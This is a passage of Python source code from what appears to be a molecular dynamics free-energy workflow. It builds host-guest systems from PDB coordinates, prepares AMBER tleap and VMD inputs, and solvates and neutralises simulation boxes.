lines = list(line for line in lines if line) # Non-blank lines in a list
# Count atoms of receptor and ligand
for i in range(0, len(lines)):
if (lines[i][0:6].strip() == 'ATOM') or (lines[i][0:6].strip() == 'HETATM'):
if (lines[i][17:20].strip() != mol) and (lines[i][17:20].strip() != 'DUM'):
recep_coords.append((float(lines[i][30:38].strip()), float(lines[i][38:46].strip()), float(lines[i][46:54].strip())))
recep_atomlist.append(lines[i][12:16].strip())
resname_list.append(lines[i][17:20].strip())
resid_list.append(float(lines[i][22:26].strip()) + dum_atom)
recep_last = int(lines[i][22:26].strip())
recep_atom += 1
total_atom += 1
elif lines[i][17:20].strip() == mol:
lig_coords.append((float(lines[i][30:38].strip()), float(lines[i][38:46].strip()), float(lines[i][46:54].strip())))
lig_atomlist.append(lines[i][12:16].strip())
resname_list.append(lines[i][17:20].strip())
resid_list.append(float(lines[i][22:26].strip()) + dum_atom)
lig_atom += 1
total_atom += 1
coords = dum_coords + recep_coords + lig_coords
atom_namelist = dum_atomlist + recep_atomlist + lig_atomlist
lig_resid = recep_last + dum_atom + 1
# Write the new pdb file
build_file = open('build.pdb', 'w')
# Positions for the dummy atoms
for i in range(0, 1):
build_file.write('%-4s %5s %-4s %3s %4.0f '%('ATOM', i+1, atom_namelist[i],resname_list[i], resid_list[i]))
build_file.write('%8.3f%8.3f%8.3f'%(float(coords[i][0]), float(coords[i][1]), float(coords[i][2])))
build_file.write('%6.2f%6.2f\n'%(0, 0))
build_file.write('TER\n')
# Positions of the receptor atoms
for i in range(dum_atom , dum_atom + recep_atom):
build_file.write('%-4s %5s %-4s %3s %4.0f '%('ATOM', i+1, atom_namelist[i],resname_list[i], resid_list[i]))
build_file.write('%8.3f%8.3f%8.3f'%(float(coords[i][0]), float(coords[i][1]), float(coords[i][2])))
build_file.write('%6.2f%6.2f\n'%(0, 0))
build_file.write('TER\n')
# Positions of the ligand atoms
for i in range(dum_atom + recep_atom, total_atom):
build_file.write('%-4s %5s %-4s %3s %4.0f '%('ATOM', i+1, atom_namelist[i],mol, float(lig_resid)))
build_file.write('%8.3f%8.3f%8.3f'%(float(coords[i][0]), float(coords[i][1]),float(coords[i][2])))
build_file.write('%6.2f%6.2f\n'%(0, 0))
build_file.write('TER\n')
build_file.write('END\n')
build_file.close()
os.chdir('../')
return 'all'
def build_rest(fwin, min_adis, max_adis, l1_range, H1, H2, H3, hmr, hmol, mol, host, guest, final_host_num, comp, win, ntpr, ntwr, ntwe, ntwx, cut, gamma_ln, barostat, amber_ff, dt, sdr_dist):
# Get files or finding new anchors and building some systems
if not os.path.exists('../build_files'):
try:
shutil.copytree('../../../build_files', '../build_files')
# Directories are the same
except shutil.Error as e:
print('Directory not copied. Error: %s' % e)
# Any error saying that the directory doesn't exist
except OSError as e:
print('Directory not copied. Error: %s' % e)
os.chdir('../build_files')
# Replace names in initial files and VMD scripts
h1_resid = H1.split('@')[0][1:]
h2_resid = H2.split('@')[0][1:]
h3_resid = H3.split('@')[0][1:]
h1_atom = H1.split('@')[1]
h2_atom = H2.split('@')[1]
h3_atom = H3.split('@')[1]
print('Receptor anchors:')
print(H1)
print(H2)
print(H3)
with open("prep-ini.tcl", "rt") as fin:
with open("prep.tcl", "wt") as fout:
for line in fin:
fout.write(line.replace('hhhh', host.lower()).replace('gggg', guest.lower()).replace('MMM', mol).replace('NN1', h1_atom).replace('H1A', str(int(h1_resid)+1)).replace('NN2', h2_atom).replace('H2A', str(int(h2_resid)+1)).replace('NN3', h3_atom).replace('H3A', str(int(h3_resid)+1)).replace('FIRST','2').replace('LAST', str(int(final_host_num)+1)).replace('STAGE','equil').replace('DMAX','%4.2f' %max_adis).replace('DMIN','%4.2f' %min_adis).replace('RANG','%4.2f' %l1_range).replace('SDRD', str(sdr_dist)))
with open("separate-ini.tcl", "rt") as fin:
with open("separate.tcl", "wt") as fout:
for line in fin:
fout.write(line.replace('MMM', mol).replace('hhhh', host.lower()).replace('gggg', guest.lower()).replace('FIRST','2').replace('LAST', str(int(final_host_num)+1)))
# Get parameters from equilibrium
if not os.path.exists('../ff'):
os.makedirs('../ff')
shutil.copy('../../../equil/ff/%s.mol2' %(guest.lower()), '../ff/')
shutil.copy('../../../equil/ff/%s.frcmod' %(guest.lower()), '../ff/')
shutil.copy('../../../equil/ff/%s.mol2' %(host.lower()), '../ff/')
shutil.copy('../../../equil/ff/%s.frcmod' %(host.lower()), '../ff/')
# Get parameter file and final state from equilibrium
for file in glob.glob('../../../equil/%s/full*.prmtop' %guest.lower()):
shutil.copy(file, './')
for file in glob.glob('../../../equil/%s/vac*' %guest.lower()):
shutil.copy(file, './')
shutil.copy('../../../equil/%s/md%02d.rst7' %(guest.lower(), fwin), './')
sp.call('cpptraj -p full.prmtop -y md%02d.rst7 -x %s-%s.pdb > cpptraj.log' %(fwin, host.lower(), guest.lower()), shell=True)
sp.call('vmd -dispdev text -e separate.tcl', shell=True)
sp.call('vmd -dispdev text -e prep.tcl', shell=True)
os.rename('./anchors.txt', 'anchors-'+guest.lower()+'.txt')
os.chdir('../rest/')
# Check size of anchor file
anchor_file = '../build_files/anchors-'+guest.lower()+'.txt'
if os.stat(anchor_file).st_size == 0:
return 'anch1'
f = open(anchor_file, 'r')
for line in f:
splitdata = line.split()
if len(splitdata) < 3:
return 'anch2'
# Copy and replace simulation files for the first window
if int(win) == 0:
if os.path.exists('amber_files'):
shutil.rmtree('./amber_files')
try:
shutil.copytree('../../../amber_files', './amber_files')
# Directories are the same
except shutil.Error as e:
print('Directory not copied. Error: %s' % e)
# Any error saying that the directory doesn't exist
except OSError as e:
print('Directory not copied. Error: %s' % e)
for dname, dirs, files in os.walk('./amber_files'):
for fname in files:
fpath = os.path.join(dname, fname)
with open(fpath) as f:
s = f.read()
s = s.replace('_step_', dt).replace('_ntpr_', ntpr).replace('_ntwr_', ntwr).replace('_ntwe_', ntwe).replace('_ntwx_', ntwx).replace('_cutoff_', cut).replace('_gamma_ln_', gamma_ln).replace('_barostat_', barostat).replace('_amber_ff_', amber_ff)
with open(fpath, "w") as f:
f.write(s)
if not os.path.exists('run_files'):
try:
shutil.copytree('../../../run_files', './run_files')
# Directories are the same
except shutil.Error as e:
print('Directory not copied. Error: %s' % e)
# Any error saying that the directory doesn't exist
except OSError as e:
print('Directory not copied. Error: %s' % e)
if hmr == 'no':
replacement = 'full.prmtop'
for dname, dirs, files in os.walk('./run_files'):
for fname in files:
fpath = os.path.join(dname, fname)
with open(fpath) as f:
s = f.read()
s = s.replace('full.hmr.prmtop', replacement)
with open(fpath, "w") as f:
f.write(s)
elif hmr == 'yes':
replacement = 'full.hmr.prmtop'
for dname, dirs, files in os.walk('./run_files'):
for fname in files:
fpath = os.path.join(dname, fname)
with open(fpath) as f:
s = f.read()
s = s.replace('full.prmtop', replacement)
with open(fpath, "w") as f:
f.write(s)
if (comp == 'a' or comp == 'l' or comp == 't'):
# Create window directory
if not os.path.exists('%s%02d' %(comp, int(win))):
os.makedirs('%s%02d' %(comp, int(win)))
os.chdir('%s%02d' %(comp, int(win)))
# Copy a few files and define new reference state
if int(win) == 0:
for file in glob.glob('../../build_files/full*.prmtop'):
shutil.copy(file, './')
for file in glob.glob('../../build_files/vac*'):
shutil.copy(file, './')
shutil.copy('../../build_files/md%02d.rst7' %fwin, './md00.rst7')
shutil.copy('../../build_files/anchors-'+guest+'.txt', './')
for file in glob.glob('../../ff/*.mol2'):
shutil.copy(file, './')
sp.call('cpptraj -p full.prmtop -y md00.rst7 -x full.rst7 > cpptraj1.log', shell=True)
shutil.copy('./full.rst7', './full.inpcrd')
sp.call('cpptraj -p full.prmtop -y md00.rst7 -x full.pdb > cpptraj2.log', shell=True)
else:
for file in glob.glob('../%s00/*' %comp):
shutil.copy(file, './')
elif comp == 'c':
# Copy files to c00 to create new box for ligand and copy to the different windows
if not os.path.exists('%s%02d' %(comp, int(win))):
os.makedirs('%s%02d' %(comp, int(win)))
os.chdir('%s%02d' %(comp, int(win)))
if int(win) == 0:
shutil.copy('../../build_files/'+guest+'.pdb', './')
shutil.copy('../../build_files/'+host+'-'+guest+'.pdb', './')
shutil.copy('../../build_files/anchors-'+guest+'.txt', './')
else:
for file in glob.glob('../c00/*'):
shutil.copy(file, './')
elif comp == 'r':
# Copy files to r00 to create new box for host and copy to the different windows
if not os.path.exists('%s%02d' %(comp, int(win))):
os.makedirs('%s%02d' %(comp, int(win)))
os.chdir('%s%02d' %(comp, int(win)))
if int(win) == 0:
# Get files and parameters for building
shutil.copy('../../build_files/'+guest+'.pdb', './')
shutil.copy('../../build_files/'+host+'.pdb', './')
shutil.copy('../../build_files/vac_host.prmtop', './')
shutil.copy('../../build_files/vac_host.pdb', './')
shutil.copy('../../build_files/'+host+'-aligned.pdb', './build.pdb')
shutil.copy('../../build_files/'+host+'-'+guest+'.pdb', './')
shutil.copy('../../build_files/anchors-'+guest+'.txt', './')
shutil.copy('../../build_files/dum.mol2', './')
shutil.copy('../../build_files/dum.frcmod', './')
for file in glob.glob('../../ff/*.frcmod'):
shutil.copy(file, './')
for file in glob.glob('../../ff/*.mol2'):
shutil.copy(file, './')
else:
for file in glob.glob('../r00/*'):
shutil.copy(file, './')
return 'all'
def build_dec(fwin, min_adis, max_adis, l1_range, H1, H2, H3, hmr, hmol, mol, host, guest, final_host_num, comp, win, ntpr, ntwr, ntwe, ntwx, cut, gamma_ln, barostat, amber_ff, dt, sdr_dist):
# Get files or finding new anchors and building some systems
if not os.path.exists('../build_files'):
try:
shutil.copytree('../../../build_files', '../build_files')
# Directories are the same
except shutil.Error as e:
print('Directory not copied. Error: %s' % e)
# Any error saying that the directory doesn't exist
except OSError as e:
print('Directory not copied. Error: %s' % e)
os.chdir('../build_files')
# Replace names in initial files and VMD scripts
h1_resid = H1.split('@')[0][1:]
h2_resid = H2.split('@')[0][1:]
h3_resid = H3.split('@')[0][1:]
h1_atom = H1.split('@')[1]
h2_atom = H2.split('@')[1]
h3_atom = H3.split('@')[1]
print('Receptor anchors:')
print(H1)
print(H2)
print(H3)
with open("prep-ini.tcl", "rt") as fin:
with open("prep.tcl", "wt") as fout:
for line in fin:
fout.write(line.replace('hhhh', host.lower()).replace('gggg', guest.lower()).replace('MMM', mol).replace('NN1', h1_atom).replace('H1A', str(int(h1_resid)+1)).replace('NN2', h2_atom).replace('H2A', str(int(h2_resid)+1)).replace('NN3', h3_atom).replace('H3A', str(int(h3_resid)+1)).replace('FIRST','2').replace('LAST', str(int(final_host_num)+1)).replace('STAGE','equil').replace('DMAX','%4.2f' %max_adis).replace('DMIN','%4.2f' %min_adis).replace('RANG','%4.2f' %l1_range).replace('SDRD', str(sdr_dist)))
with open("separate-ini.tcl", "rt") as fin:
with open("separate.tcl", "wt") as fout:
for line in fin:
fout.write(line.replace('MMM', mol).replace('hhhh', host.lower()).replace('gggg', guest.lower()).replace('FIRST','2').replace('LAST', str(int(final_host_num)+1)))
# Get parameters from equilibrium
if not os.path.exists('../ff'):
os.makedirs('../ff')
shutil.copy('../../../equil/ff/%s.mol2' %(guest.lower()), '../ff/')
shutil.copy('../../../equil/ff/%s.frcmod' %(guest.lower()), '../ff/')
shutil.copy('../../../equil/ff/%s.mol2' %(host.lower()), '../ff/')
shutil.copy('../../../equil/ff/%s.frcmod' %(host.lower()), '../ff/')
# Get parameter file and final state from equilibrium
for file in glob.glob('../../../equil/%s/full*.prmtop' %guest.lower()):
shutil.copy(file, './')
for file in glob.glob('../../../equil/%s/vac*' %guest.lower()):
shutil.copy(file, './')
shutil.copy('../../../equil/%s/md%02d.rst7' %(guest.lower(), fwin), './')
sp.call('cpptraj -p full.prmtop -y md%02d.rst7 -x %s-%s.pdb > cpptraj.log' %(fwin, host.lower(), guest.lower()), shell=True)
sp.call('vmd -dispdev text -e separate.tcl', shell=True)
sp.call('vmd -dispdev text -e prep.tcl', shell=True)
os.rename('./anchors.txt', 'anchors-'+guest.lower()+'.txt')
os.chdir('../sdr/')
# Check size of anchor file
anchor_file = '../build_files/anchors-'+guest.lower()+'.txt'
if os.stat(anchor_file).st_size == 0:
return 'anch1'
f = open(anchor_file, 'r')
for line in f:
splitdata = line.split()
if len(splitdata) < 3:
return 'anch2'
# Copy and replace simulation files for the first window
if int(win) == 0:
if os.path.exists('./amber_files'):
shutil.rmtree('./amber_files')
try:
shutil.copytree('../../../amber_files', './amber_files')
# Directories are the same
except shutil.Error as e:
print('Directory not copied. Error: %s' % e)
# Any error saying that the directory doesn't exist
except OSError as e:
print('Directory not copied. Error: %s' % e)
for dname, dirs, files in os.walk('./amber_files'):
for fname in files:
fpath = os.path.join(dname, fname)
with open(fpath) as f:
s = f.read()
s = s.replace('_step_', dt).replace('_ntpr_', ntpr).replace('_ntwr_', ntwr).replace('_ntwe_', ntwe).replace('_ntwx_', ntwx).replace('_cutoff_', cut).replace('_gamma_ln_', gamma_ln).replace('_barostat_', barostat).replace('_amber_ff_', amber_ff)
with open(fpath, "w") as f:
f.write(s)
if not os.path.exists('./run_files'):
try:
shutil.copytree('../../../run_files', './run_files')
# Directories are the same
except shutil.Error as e:
print('Directory not copied. Error: %s' % e)
# Any error saying that the directory doesn't exist
except OSError as e:
print('Directory not copied. Error: %s' % e)
if hmr == 'no':
replacement = 'full.prmtop'
for dname, dirs, files in os.walk('./run_files'):
for fname in files:
fpath = os.path.join(dname, fname)
with open(fpath) as f:
s = f.read()
s = s.replace('full.hmr.prmtop', replacement)
with open(fpath, "w") as f:
f.write(s)
elif hmr == 'yes':
replacement = 'full.hmr.prmtop'
for dname, dirs, files in os.walk('./run_files'):
for fname in files:
fpath = os.path.join(dname, fname)
with open(fpath) as f:
s = f.read()
s = s.replace('full.prmtop', replacement)
with open(fpath, "w") as f:
f.write(s)
if not os.path.exists('./%s%02d' %(comp, int(win))):
os.makedirs('./%s%02d' %(comp, int(win)))
os.chdir('./%s%02d' %(comp, int(win)))
if int(win) == 0:
for file in glob.glob('../../build_files/vac*'):
shutil.copy(file, './')
shutil.copy('../../build_files/'+host+'.pdb', './')
shutil.copy('../../build_files/'+guest+'.pdb', './')
shutil.copy('../../build_files/'+host+'-'+guest+'.pdb', './')
shutil.copy('../../build_files/'+host+'-'+guest+'-aligned.pdb', './build-ini.pdb')
shutil.copy('../../build_files/anchors-'+guest+'.txt', './')
shutil.copy('../../build_files/dum.frcmod', './')
shutil.copy('../../build_files/dum.mol2', './')
for file in glob.glob('../../ff/*.frcmod'):
shutil.copy(file, './')
for file in glob.glob('../../ff/*.mol2'):
shutil.copy(file, './')
dum_coords = []
recep_coords = []
lig_coords = []
dum_atomlist = []
lig_atomlist = []
recep_atomlist = []
dum_atom = 0
lig_atom = 0
recep_atom = 0
total_atom = 0
resid_lig = 0
resname_lig = mol
resname_list = []
resid_list = []
# Read coordinates for dummy atoms
for i in range(1, 3):
shutil.copy('../../build_files/dum'+str(i)+'.pdb', './')
with open('dum'+str(i)+'.pdb') as dum_in:
lines = (line.rstrip() for line in dum_in)
lines = list(line for line in lines if line)
dum_coords.append((float(lines[1][30:38].strip()), float(lines[1][38:46].strip()), float(lines[1][46:54].strip())))
dum_atomlist.append(lines[1][12:16].strip())
resname_list.append(lines[1][17:20].strip())
resid_list.append(float(lines[1][22:26].strip()))
dum_atom += 1
total_atom += 1
# Read coordinates from aligned system
with open('build-ini.pdb') as f_in:
lines = (line.rstrip() for line in f_in)
lines = list(line for line in lines if line) # Non-blank lines in a list
# Count atoms of receptor and ligand
for i in range(0, len(lines)):
if (lines[i][0:6].strip() == 'ATOM') or (lines[i][0:6].strip() == 'HETATM'):
if (lines[i][17:20].strip() != mol) and (lines[i][17:20].strip() != 'DUM'):
recep_coords.append((float(lines[i][30:38].strip()), float(lines[i][38:46].strip()), float(lines[i][46:54].strip())))
recep_atomlist.append(lines[i][12:16].strip())
resname_list.append(lines[i][17:20].strip())
resid_list.append(float(lines[i][22:26].strip()) + dum_atom)
recep_last = int(lines[i][22:26].strip())
recep_atom += 1
total_atom += 1
elif lines[i][17:20].strip() == mol:
lig_coords.append((float(lines[i][30:38].strip()), float(lines[i][38:46].strip()), float(lines[i][46:54].strip())))
lig_atomlist.append(lines[i][12:16].strip())
resname_list.append(lines[i][17:20].strip())
resid_list.append(float(lines[i][22:26].strip()) + dum_atom)
lig_atom += 1
total_atom += 1
coords = dum_coords + recep_coords + lig_coords
atom_namelist = dum_atomlist + recep_atomlist + lig_atomlist
lig_resid = recep_last + dum_atom + 1
# Write the new pdb file
build_file = open('build.pdb', 'w')
# Positions for the dummy atoms
for i in range(0, 2):
build_file.write('%-4s %5s %-4s %3s %4.0f '%('ATOM', i+1, atom_namelist[i],resname_list[i], resid_list[i]))
build_file.write('%8.3f%8.3f%8.3f'%(float(coords[i][0]), float(coords[i][1]), float(coords[i][2])))
build_file.write('%6.2f%6.2f\n'%(0, 0))
build_file.write('TER\n')
# Positions of the receptor atoms
for i in range(dum_atom , dum_atom + recep_atom):
build_file.write('%-4s %5s %-4s %3s %4.0f '%('ATOM', i+1, atom_namelist[i],resname_list[i], resid_list[i]))
build_file.write('%8.3f%8.3f%8.3f'%(float(coords[i][0]), float(coords[i][1]), float(coords[i][2])))
build_file.write('%6.2f%6.2f\n'%(0, 0))
build_file.write('TER\n')
# Positions of the ligand atoms
for i in range(dum_atom + recep_atom, total_atom):
build_file.write('%-4s %5s %-4s %3s %4.0f '%('ATOM', i+1, atom_namelist[i],mol, float(lig_resid)))
build_file.write('%8.3f%8.3f%8.3f'%(float(coords[i][0]), float(coords[i][1]),float(coords[i][2])))
build_file.write('%6.2f%6.2f\n'%(0, 0))
build_file.write('TER\n')
# Extra guests for decoupling
build_file = open('build.pdb', 'a')
if (comp == 'e'):
for i in range(0, lig_atom):
build_file.write('%-4s %5s %-4s %3s %4.0f '%('ATOM', i+1, lig_atomlist[i],mol, float(lig_resid+1)))
build_file.write('%8.3f%8.3f%8.3f'%(float(lig_coords[i][0]), float(lig_coords[i][1]),float(lig_coords[i][2])))
build_file.write('%6.2f%6.2f\n'%(0, 0))
build_file.write('TER\n')
for i in range(0, lig_atom):
build_file.write('%-4s %5s %-4s %3s %4.0f '%('ATOM', i+1, lig_atomlist[i],mol, float(lig_resid+2)))
build_file.write('%8.3f%8.3f%8.3f'%(float(lig_coords[i][0]), float(lig_coords[i][1]),float(lig_coords[i][2]+sdr_dist)))
build_file.write('%6.2f%6.2f\n'%(0, 0))
build_file.write('TER\n')
for i in range(0, lig_atom):
build_file.write('%-4s %5s %-4s %3s %4.0f '%('ATOM', i+1, lig_atomlist[i],mol, float(lig_resid+3)))
build_file.write('%8.3f%8.3f%8.3f'%(float(lig_coords[i][0]), float(lig_coords[i][1]),float(lig_coords[i][2]+sdr_dist)))
build_file.write('%6.2f%6.2f\n'%(0, 0))
print('Creating new system for decharging...')
else:
for i in range(0, lig_atom):
build_file.write('%-4s %5s %-4s %3s %4.0f '%('ATOM', i+1, lig_atomlist[i],mol, float(lig_resid + 1)))
build_file.write('%8.3f%8.3f%8.3f'%(float(lig_coords[i][0]), float(lig_coords[i][1]),float(lig_coords[i][2]+sdr_dist)))
build_file.write('%6.2f%6.2f\n'%(0, 0))
print('Creating new system for vdw decoupling...')
build_file.write('TER\n')
build_file.write('END\n')
build_file.close()
else:
for file in glob.glob('../'+comp+'00/*'):
shutil.copy(file, './')
return 'all'
def create_box(comp, hmr, guest, host, mol, hmol, num_waters, water_model, ion_def, neut, buffer_x, buffer_y, buffer_z, stage, ntpr, ntwr, ntwe, ntwx, cut, gamma_ln, barostat, amber_ff, dt, final_host_num):
# Copy and replace simulation files
if stage == 'equil':
if os.path.exists('amber_files'):
shutil.rmtree('./amber_files')
try:
shutil.copytree('../amber_files', './amber_files')
# Directories are the same
except shutil.Error as e:
print('Directory not copied. Error: %s' % e)
# Any error saying that the directory doesn't exist
except OSError as e:
print('Directory not copied. Error: %s' % e)
for dname, dirs, files in os.walk('./amber_files'):
for fname in files:
fpath = os.path.join(dname, fname)
with open(fpath) as f:
s = f.read()
s = s.replace('_step_', dt).replace('_ntpr_', ntpr).replace('_ntwr_', ntwr).replace('_ntwe_', ntwe).replace('_ntwx_', ntwx).replace('_cutoff_', cut).replace('_gamma_ln_', gamma_ln).replace('_barostat_', barostat).replace('_amber_ff_', amber_ff)
with open(fpath, "w") as f:
f.write(s)
os.chdir(guest)
# Copy any additional parameters and bonds
if stage == 'equil':
for file in glob.glob('../../parameters/*.dat'):
shutil.copy(file, './')
if os.path.exists('../../parameters/host_bonds'):
shutil.copy('../../parameters/host_bonds', './')
else:
for file in glob.glob('../../../../parameters/*.dat'):
shutil.copy(file, './')
if os.path.exists('../../../../parameters/host_bonds'):
shutil.copy('../../../../parameters/host_bonds', './')
# Configure bonds
host_bonds = []
host_bonds1 = []
if os.path.exists('./host_bonds'):
with open('./host_bonds') as fin:
lines = (line.rstrip() for line in fin)
lines = list(line for line in lines if line) # Non-blank lines in a list
host_bonds = list(lines)
for i in range(0, len(lines)):
data = lines[i].split()
for j in range(1, len(data)):
for k in range(0, final_host_num):
num_r = int(data[j].split('.')[1])
if num_r == k+1:
p = k+1
n = k+2
data[j] = data[j].replace('model.'+str(p),'model.'+str(n))
break
lines[i] = '%s %s %s' %(data[0], data[1], data[2])
host_bonds1 = list(lines)
if (comp == 'e' or comp == 'v'):
host_bonds = []
host_bonds2 = []
if os.path.exists('./host_bonds'):
with open('./host_bonds') as fin:
lines = (line.rstrip() for line in fin)
lines = list(line for line in lines if line) # Non-blank lines in a list
host_bonds = list(lines)
for i in range(0, len(lines)):
data = lines[i].split()
for j in range(1, len(data)):
for k in range(0, final_host_num):
num_r = int(data[j].split('.')[1])
if num_r == k+1:
p = k+1
n = k+3
data[j] = data[j].replace('model.'+str(p),'model.'+str(n))
break
lines[i] = '%s %s %s' %(data[0], data[1], data[2])
host_bonds2 = list(lines)
# Copy tleap files that are used for restraint generation and analysis
shutil.copy('../amber_files/tleap.in.amber16', 'tleap_vac.in')
shutil.copy('../amber_files/tleap.in.amber16', 'tleap_vac_guest.in')
shutil.copy('../amber_files/tleap.in.amber16', 'tleap_vac_host.in')
shutil.copy('../amber_files/tleap.in.amber16', 'tleap.in')
# Copy host and guest parameter files
for file in glob.glob('../ff/*'):
shutil.copy(file, './')
# Append tleap file for vacuum
tleap_vac = open('tleap_vac.in', 'a')
tleap_vac.write('# Load the guest parameters\n')
tleap_vac.write('loadamberparams %s.frcmod\n'%(guest.lower()))
tleap_vac.write('%s = loadmol2 %s.mol2\n\n'%(mol.upper(), guest.lower()))
tleap_vac.write('# Load the host parameters\n')
tleap_vac.write('loadamberparams %s.frcmod\n'%(host.lower()))
tleap_vac.write('%s = loadmol2 %s.mol2\n\n'%(hmol.upper(), host.lower()))
tleap_vac.write('model = loadpdb build.pdb\n\n')
# Add bonds
if (comp == 'r' or comp == 'q'):
if len(host_bonds1) > 0:
for i in host_bonds1:
tleap_vac.write('%s\n' % i)
elif (comp == 'v' or comp == 'e'):
if len(host_bonds2) > 0:
for i in host_bonds2:
tleap_vac.write('%s\n' % i)
tleap_vac.write('\n')
tleap_vac.write('check model\n')
tleap_vac.write('savepdb model vac.pdb\n')
tleap_vac.write('saveamberparm model vac.prmtop vac.inpcrd\n')
tleap_vac.write('quit\n')
tleap_vac.close()
# Generate complex in vacuum
p = sp.call('tleap -s -f tleap_vac.in > tleap_vac.log', shell=True)
# Append tleap file for guest only
tleap_vac_ligand = open('tleap_vac_guest.in', 'a')
tleap_vac_ligand.write('# Load the guest parameters\n')
tleap_vac_ligand.write('loadamberparams %s.frcmod\n'%(guest.lower()))
tleap_vac_ligand.write('%s = loadmol2 %s.mol2\n\n'%(mol.upper(), guest.lower()))
tleap_vac_ligand.write('model = loadpdb %s.pdb\n\n' %(guest.lower()))
tleap_vac_ligand.write('check model\n')
tleap_vac_ligand.write('savepdb model vac_guest.pdb\n')
tleap_vac_ligand.write('saveamberparm model vac_guest.prmtop vac_guest.inpcrd\n')
tleap_vac_ligand.write('quit\n')
tleap_vac_ligand.close()
# Generate guest structure in vacuum
p = sp.call('tleap -s -f tleap_vac_guest.in > tleap_vac_guest.log', shell=True)
if stage == 'equil':
# Append tleap file for host only
tleap_vac_ligand = open('tleap_vac_host.in', 'a')
tleap_vac_ligand.write('# Load the host parameters\n')
tleap_vac_ligand.write('loadamberparams %s.frcmod\n'%(host.lower()))
tleap_vac_ligand.write('%s = loadmol2 %s.mol2\n\n'%(hmol.upper(), host.lower()))
tleap_vac_ligand.write('model = loadpdb %s.pdb\n\n' %(host.lower()))
# Add bonds
if len(host_bonds) > 0:
for i in host_bonds:
tleap_vac_ligand.write('%s\n' % i)
tleap_vac_ligand.write('\n')
tleap_vac_ligand.write('check model\n')
tleap_vac_ligand.write('savepdb model vac_host.pdb\n')
tleap_vac_ligand.write('saveamberparm model vac_host.prmtop vac_host.inpcrd\n')
tleap_vac_ligand.write('quit\n')
tleap_vac_ligand.close()
# Generate host structure in vacuum
p = sp.call('tleap -s -f tleap_vac_host.in > tleap_vac_host.log', shell=True)
# Find out how many cations/anions are needed for neutralization
neu_cat = 0
neu_ani = 0
f = open('tleap_vac.log', 'r')
for line in f:
if "The unperturbed charge of the unit" in line:
splitline = line.split()
if float(splitline[6].strip('\'\",.:;#()][')) < 0:
neu_cat = round(float(re.sub('[+-]', '', splitline[6].strip('\'\"-,.:;#()]['))))
elif float(splitline[6].strip('\'\",.:;#()][')) > 0:
neu_ani = round(float(re.sub('[+-]', '', splitline[6].strip('\'\"-,.:;#()]['))))
f.close()
# Get ligand removed charge when doing LJ calculations
lig_cat = 0
lig_ani = 0
f = open('tleap_vac_guest.log', 'r')
for line in f:
if "The unperturbed charge of the unit" in line:
splitline = line.split()
if float(splitline[6].strip('\'\",.:;#()][')) < 0:
lig_cat = round(float(re.sub('[+-]', '', splitline[6].strip('\'\"-,.:;#()]['))))
elif float(splitline[6].strip('\'\",.:;#()][')) > 0:
lig_ani = round(float(re.sub('[+-]', '', splitline[6].strip('\'\"-,.:;#()]['))))
f.close()
# Adjust ions for LJ and electrostatic Calculations (avoid neutralizing plasma)
if comp == 'v':
charge_neut = neu_cat - neu_ani - 2*lig_cat + 2*lig_ani
neu_cat = 0
neu_ani = 0
if charge_neut > 0:
neu_cat = abs(charge_neut)
if charge_neut < 0:
neu_ani = abs(charge_neut)
if comp == 'e':
charge_neut = neu_cat - neu_ani - 3*lig_cat + 3*lig_ani
neu_cat = 0
neu_ani = 0
# print (charge_neut)
if charge_neut > 0:
neu_cat = abs(charge_neut)
if charge_neut < 0:
neu_ani = abs(charge_neut)
# Define volume density for different water models
if water_model == 'TIP3P':
water_box = water_model.upper()+'BOX'
ratio = 0.0576
elif water_model == 'SPCE':
water_box = 'SPCBOX'
ratio = 0.0576
elif water_model == 'TIP4PEW':
water_box = water_model.upper()+'BOX'
ratio = 0.0573
# Fixed number of water molecules
if num_waters != 0:
# Create the first box guess to get the initial number of waters and cross sectional area
buff = 50.0
scripts.write_tleap(mol, hmol, guest, host, water_model, water_box, buff, buffer_x, buffer_y)
num_added = scripts.check_tleap()
cross_area = scripts.cross_sectional_area()
# First iteration to estimate box volume and number of ions
res_diff = num_added - num_waters
buff_diff = res_diff/(ratio*cross_area)
buff -= buff_diff
print(buff)
if buff < 0:
print ('Not enough water molecules to fill the system in the z direction, please increase the number of water molecules')
sys.exit(1)
# Get box volume and number of added ions
scripts.write_tleap(mol, hmol, guest, host, water_model, water_box, buff, buffer_x, buffer_y)
box_volume = scripts.box_volume()
print(box_volume)
num_cations = round(0.85*ion_def[2]*6.02e23*box_volume*1e-27) # 0.85 factor to account for some shrinking of the box during equilibration
print(num_cations)
# Number of cations and anions
num_cat = num_cations
num_ani = num_cations - neu_cat + neu_ani
# If there are not enough chosen cations to neutralize the system
if num_ani < 0:
num_cat = neu_cat
num_cations = neu_cat
num_ani = 0
# Update target number of residues according to the ion definitions
if (neut == 'no'):
target_num = int(num_waters - neu_cat + neu_ani + 2*int(num_cations))
elif (neut == 'yes'):
target_num = int(num_waters + neu_cat + neu_ani)
# Define a few parameters for solvation iteration
buff = 50.0
count = 0
max_count = 10
rem_limit = 16
factor = 1
ind = 0.90
buff_diff = 1.0
# Iterate to get the correct number of waters
while num_added != target_num:
count += 1
if count > max_count:
# Try different parameters
rem_limit += 4
if ind > 0.5:
ind = ind - 0.02
else:
ind = 0.90
factor = 1
max_count = max_count + 10
tleap_remove = None
# Manually remove waters if inside removal limit
if num_added > target_num and (num_added - target_num) < rem_limit:
difference = num_added - target_num
tleap_remove = [target_num + 1 + i for i in range(difference)]
scripts.write_tleap(mol, hmol, guest, host, water_model, water_box, buff, buffer_x, buffer_y, tleap_remove)
scripts.check_tleap()
break
# Set new buffer size based on chosen water density
res_diff = num_added - target_num - (rem_limit/2)
buff_diff = res_diff/(ratio*cross_area)
buff -= (buff_diff * factor)
if buff < 0:
print ('Not enough water molecules to fill the system in the z direction, please increase the number of water molecules or reduce the x and y buffers')
sys.exit(1)
# Set relaxation factor
factor = ind * factor
# Get number of waters
scripts.write_tleap(mol, hmol, guest, host, water_model, water_box, buff, buffer_x, buffer_y)
num_added = scripts.check_tleap()
# Fixed z buffer
elif buffer_z != 0:
buff = buffer_z
tleap_remove = None
# Get box volume and number of added ions
scripts.write_tleap(mol, hmol, guest, host, water_model, water_box, buff, buffer_x, buffer_y)
box_volume = scripts.box_volume()
print(box_volume)
num_cations = round(0.85*ion_def[2]*6.02e23*box_volume*1e-27) # 0.85 factor to account for some shrinking of the box during equilibration
# Number of cations and anions
num_cat = num_cations
num_ani = num_cations - neu_cat + neu_ani
# If there are not enough chosen cations to neutralize the system
if num_ani < 0:
num_cat = neu_cat
num_cations = neu_cat
num_ani = 0
print(num_cations)
# Write the final tleap file with the correct system size and removed water molecules
